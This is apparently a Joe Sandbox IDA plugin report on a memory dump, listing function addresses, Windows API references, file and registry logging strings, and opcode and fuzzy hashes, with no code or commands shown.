Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 7b5cfa9264d3722753f48c3057c2910e47a5fc1496268bc5207db179291c80f5
Instruction ID: 2effbb2ac9323e81c0951529680ace9405c80b9dfadc3614038775184c3fdaca
Opcode Fuzzy Hash: 7b5cfa9264d3722753f48c3057c2910e47a5fc1496268bc5207db179291c80f5
Instruction Fuzzy Hash: A1F0B413B0A9034DF9139A06B4017BC12411FA13B1E4D06F5CE2D2AAE5AE3DA8C39304

Function 00007FFE13386290 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d5bcd52f56a6e8500c5b09500c98dadbfd880aeccdf7c7cdb7d27f3d0aab3cd4
Instruction ID: c2a27a62da5da4cceb82ddc2cc13f70b9069f1db666b2499920285fa7883c871
Opcode Fuzzy Hash: d5bcd52f56a6e8500c5b09500c98dadbfd880aeccdf7c7cdb7d27f3d0aab3cd4
Instruction Fuzzy Hash: 63F0B413B0A9034DF9139A06B4017BC12411FA13B1E4D06F68E2D2AEE5AE3DA8C39304

Function 00007FFE13386268 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
Instruction ID: ef2086a0ea842e7a849c63a149cc6959894656122c03715d98caf78d6ceabcbf
Opcode Fuzzy Hash: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
Instruction Fuzzy Hash: F4F05453B0A9034DF9539A06B4417BD12411FA17B1E4D06F58E6D2AAE5AE3DA8C79304

Function 00007FFE13386272 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
Instruction ID: 05446d8a877d45bc4edebcf6191b535a621ca3402e3195da6af2609802fc5929
Opcode Fuzzy Hash: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
Instruction Fuzzy Hash: 55F0B413B0AA034DF9139A06B4017BC12411FA13B1E4D07F58E2D2AAE5AE3DA8C39304

Function 00007FFE1338627C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
Instruction ID: 1f40665af35233cde3144858dd2ecaba3e091c57a968bb02b0dcdaac01b0ba8d
Opcode Fuzzy Hash: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
Instruction Fuzzy Hash: BBF0B413B0A9034DF9139A06B4017BD12421FA13B1E4D06F58E2D2AAE5AE3DA8C39304

Function 00007FFE13386185 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d5bcd52f56a6e8500c5b09500c98dadbfd880aeccdf7c7cdb7d27f3d0aab3cd4
Instruction ID: c2a27a62da5da4cceb82ddc2cc13f70b9069f1db666b2499920285fa7883c871
Opcode Fuzzy Hash: d5bcd52f56a6e8500c5b09500c98dadbfd880aeccdf7c7cdb7d27f3d0aab3cd4
Instruction Fuzzy Hash: 63F0B413B0A9034DF9139A06B4017BC12411FA13B1E4D06F68E2D2AEE5AE3DA8C39304

Function 00007FFE1338658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ab2b58690d4633de34a1eff2ff73d343619643ca4b4637b53fc883911d8892d2
Instruction ID: 002a72d36b8507c30ac2e5d891574fab2a53a54b163a1fe3fa8a5d0d17619555
Opcode Fuzzy Hash: ab2b58690d4633de34a1eff2ff73d343619643ca4b4637b53fc883911d8892d2
Instruction Fuzzy Hash: 50F0B413B0A9024DF9139A06B4017BC02411FA13B1E4D06F28E2D2AEE5AE3DA8C29304

Function 00007FFE133861A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
Instruction ID: ef2086a0ea842e7a849c63a149cc6959894656122c03715d98caf78d6ceabcbf
Opcode Fuzzy Hash: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
Instruction Fuzzy Hash: F4F05453B0A9034DF9539A06B4417BD12411FA17B1E4D06F58E6D2AAE5AE3DA8C79304

Function 00007FFE133861B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
Instruction ID: 05446d8a877d45bc4edebcf6191b535a621ca3402e3195da6af2609802fc5929
Opcode Fuzzy Hash: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
Instruction Fuzzy Hash: 55F0B413B0AA034DF9139A06B4017BC12411FA13B1E4D07F58E2D2AAE5AE3DA8C39304

Function 00007FFE133861BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
Instruction ID: 1f40665af35233cde3144858dd2ecaba3e091c57a968bb02b0dcdaac01b0ba8d
Opcode Fuzzy Hash: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
Instruction Fuzzy Hash: BBF0B413B0A9034DF9139A06B4017BD12421FA13B1E4D06F58E2D2AAE5AE3DA8C39304

Function 00007FFE1338615D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
Instruction ID: ef2086a0ea842e7a849c63a149cc6959894656122c03715d98caf78d6ceabcbf
Opcode Fuzzy Hash: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
Instruction Fuzzy Hash: F4F05453B0A9034DF9539A06B4417BD12411FA17B1E4D06F58E6D2AAE5AE3DA8C79304

Function 00007FFE13386167 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
Instruction ID: 05446d8a877d45bc4edebcf6191b535a621ca3402e3195da6af2609802fc5929
Opcode Fuzzy Hash: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
Instruction Fuzzy Hash: 55F0B413B0AA034DF9139A06B4017BC12411FA13B1E4D07F58E2D2AAE5AE3DA8C39304

Function 00007FFE13386171 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
Instruction ID: 1f40665af35233cde3144858dd2ecaba3e091c57a968bb02b0dcdaac01b0ba8d
Opcode Fuzzy Hash: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
Instruction Fuzzy Hash: BBF0B413B0A9034DF9139A06B4017BD12421FA13B1E4D06F58E2D2AAE5AE3DA8C39304

Function 00007FFE1338617B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 7b5cfa9264d3722753f48c3057c2910e47a5fc1496268bc5207db179291c80f5
Instruction ID: 2effbb2ac9323e81c0951529680ace9405c80b9dfadc3614038775184c3fdaca
Opcode Fuzzy Hash: 7b5cfa9264d3722753f48c3057c2910e47a5fc1496268bc5207db179291c80f5
Instruction Fuzzy Hash: A1F0B413B0A9034DF9139A06B4017BC12411FA13B1E4D06F5CE2D2AAE5AE3DA8C39304

Function 00007FFE1338A5B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1338A585

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

registry_set_value, xrefs: 00007FFE1338A59E
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1338A5A5

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 13a7cb61c00d25443b3b9a661bab418efe9fb22132e9429bd1f01525c86fbb2f
Instruction ID: 7ec8e16228d2c9719c2f5b329cd0850853bbb01705e711ce309518e66ef9def4
Opcode Fuzzy Hash: 13a7cb61c00d25443b3b9a661bab418efe9fb22132e9429bd1f01525c86fbb2f
Instruction Fuzzy Hash: 36E01252A1CE4A89F551AB02FC1007D2250EB607A5F4052F5ED6F67AB0DE2CE5CAD309

Function 00007FFE1338A566 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1338A585

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

registry_set_value, xrefs: 00007FFE1338A59E
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1338A5A5

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 2abf9f985886171be785bc874de6f574e45e6e99241a3bc1d998fa1d3d941a66
Instruction ID: 603236f25351b3cced0d9fe4d7c046d50a9b2412e69715b755397cb22f304d6a
Opcode Fuzzy Hash: 2abf9f985886171be785bc874de6f574e45e6e99241a3bc1d998fa1d3d941a66
Instruction Fuzzy Hash: 62E01252A1DE4A89F511AB02FC1007D2254EB607A5F4002F6ED6F67AB0DE2CE5C6D309

Function 00007FFE1338A147 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1338A1F7

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1338A217
registry_del_value, xrefs: 00007FFE1338A210

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: a9753b631b1e23125cccc6be91f6982892053f68cc0d1430d7c464c6d8d017b2
Instruction ID: 53553c8a0640ff940367745ead7a432a1f709a7f5f7a503145c55b99b198ff32
Opcode Fuzzy Hash: a9753b631b1e23125cccc6be91f6982892053f68cc0d1430d7c464c6d8d017b2
Instruction Fuzzy Hash: 42E01251A0CE4A8DF5109B06FC101792255FF617A8F5002B5E96E66A719D2CD5C69308

Function 00007FFE1338A151 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1338A1F7

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1338A217
registry_del_value, xrefs: 00007FFE1338A210

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

